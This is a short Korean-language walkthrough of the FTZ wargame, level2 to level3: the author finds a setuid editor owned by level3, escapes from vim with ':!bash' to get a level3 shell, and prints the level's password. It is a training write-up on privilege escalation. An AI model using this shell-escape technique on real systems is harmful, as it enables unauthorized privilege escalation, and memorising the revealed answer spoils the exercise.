FTZ level2 -> level3

FTZ level2 -> level3

먼저 파일을 확인 하고, hint 파일을 보니 다음과 같다.

[level2@ftz level2]$ ls
hint  public_html  tmp
[level2@ftz level2]$ cat hint 
​
​
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...
​
​
[level2@ftz level2]$

find를 이용해 찾아보자

[level2@ftz level2]$ find / -user level3 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$ ls -al /usr/bin/editor 
-rwsr-x---    1 level3   level2      11651 Sep 10  2011 /usr/bin/editor

level3권한이 걸려있는 editor라는 이름의 프로그램을 실행해보면 vim이 나온다.

level1->level2와 같이 편집 프로그램 실행 중 외부 명령어를 실행시켜보자

~
~
~
~
~
~
~
~
~                             VIM - Vi IMproved
~
~                              version 6.1.320
~                         by Bram Moolenaar et al.
~                Vim is open source and freely distributable
~
~                       Help poor children in Uganda!
~              type  :help iccf<Enter>       for information
~
~              type  :q<Enter>               to exit
~              type  :help<Enter>  or  <F1>  for on-line help
~              type  :help version6<Enter>   for version info
~
~
~
~
~
~
~
~
~
:!bash

위처럼 쉘을 실행시켜보니

[level3@ftz level2]$

level3권한의 쉘이 실행된 것을 확인할 수 있다. 이후 my-pass를 실행하면 된다.

Level3 Password is "can you fly?".